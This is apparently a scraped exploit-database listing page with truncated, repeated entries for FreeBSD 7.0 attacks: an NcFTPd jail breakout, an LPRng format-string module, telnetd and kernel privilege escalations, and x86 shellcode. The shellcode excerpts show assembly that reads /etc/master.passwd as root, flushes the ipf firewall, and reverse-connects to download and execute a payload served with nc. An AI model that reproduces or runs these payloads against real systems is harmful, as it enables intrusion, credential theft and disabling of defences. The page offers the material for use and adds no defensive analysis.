NcFTPd <= 2.8.5 - Remote Jail Breakout Vulnerability

No description provided by source. NcFTPd = 2.8.5 remote jail breakout Discovered by: Kingcope Contact: kcope2atgooglemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFT...

LPRng use_syslog Remote Format String Vulnerability

This module exploits a format string vulnerability in the LPRng print server. This vulnerability was discovered by Chris Evans. There was a publicly circulating worm targeting this vulnerability, which prompted RedHat to pull their 7.0 release. They consequently re-released it as "7.0-respin". Th...

LPRng use_syslog Remote Format String Vulnerability

$Id: lprngformatstring.rb 8530 2010-02-17 00:56:28Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...

NcFTPD 2.8.5 Jail Breakout

NcFTPd googlemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 latest version: ftp 192.168.2.5 Connected to 192.168.2.5. 220 localhost NcFTPd Server unregister...

NcFTPd <= 2.8.5 Remote Jail Breakout Vulnerability

Exploit for freebsd platform in category remote exploits ================================================== NcFTPd get /etc/passwd passwd local: passwd remote: /etc/passwd 502 Unimplemented command. 227 Entering Passive Mode 192,168,2,5,219,171 550 No such file. ftp ls .. 227 Entering Passive Mod...

NcFTPd 2.8.5 - Remote Jail Breakout

NcFTPd 2.8.5 - Remote Jail Breakout NcFTPd googlemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 latest version: ftp 192.168.2.5 Connected to 192.168.2.5. 22...

FreeBSD/x86 - setuid(0)&amp;execve({&quot;//sbin/ipf&quot;,&quot;-Faa&quot;,0},0); - 57 bytes

No description provided by source. ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax push eax mov al, 0x17 int 0x80 ; --------------------- -Faa xo...

FreeBSD/x86 - execve(/bin/cat &amp; /etc/master.passwd) - 65 bytes

No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...

FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation

FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation FreeBSD 7.0-RELEASE telnet daemon local privilege escalation - And possible remote root code excution. There is a rather big bug in the current FreeBSD telnetd daemon. The environment is not properly sanitized when execution /bin/login, wha...

FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit

Exploit for freebsd platform in category local exploits ==================================================================== FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit ==================================================================== FreeBSD 7.0-RELEASE telnet daemon...

FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation

FreeBSD 7.0-RELEASE telnet daemon local privilege escalation - And possible remote root code excution. There is a rather big bug in the current FreeBSD telnetd daemon. The environment is not properly sanitized when execution /bin/login, what leads to a possible remote root hole. The telnet protoc...

FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit

No description provided by source. FreeBSD 7.0-RELEASE telnet daemon local privilege escalation - And possible remote root code excution. There is a rather big bug in the current FreeBSD telnetd daemon. The environment is not properly sanitized when execution /bin/login, what leads to a possible...

FreeBSD 7/6x protosw kernel exploit

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 uname -rs FreeBSD 7.0-RELEASE id uid=1001donb gid=1001donb groups=1001donb,0wheel grep ^root /etc/master.passwd grep: /etc/master.passwd: Permission denied nm /boot/kernel/kernel | grep allproc c0bf26b8 B allproc c0bf2670 B allproclock cc -o x x.c ./x...

freebsd/x86 rev connect, recv, jmp, return results 90 bytes

No description provided by source. / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 shellcodeinfile ; setuid0; socket; connect; dups; recv; jmp; exit; ; 90...

freebsd/x86 rev connect, recv, jmp, return results 90 bytes

Exploit for freebsd/x86 platform in category shellcode =========================================================== freebsd/x86 rev connect, recv, jmp, return results 90 bytes =========================================================== / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exi...

freebsd/x86 rev connect, recv, jmp, return results 90 bytes

freebsd/x86 rev connect, recv, jmp, return results 90 bytes. Shellcode exploit for freebsdx86 platform / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 pls ex...

freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes

No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...

freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes

Exploit for freebsd/x86 platform in category shellcode ============================================================ freebsd/x86 /bin/cat /etc/master.passwd NULL free 65 bytes ============================================================ ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBS...

freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes

No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...

freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 56 bytes

No description provided by source. ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 56 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax ;0 mov al, 0x17 int 0x80 ; --------------------- -Faa xor eax,...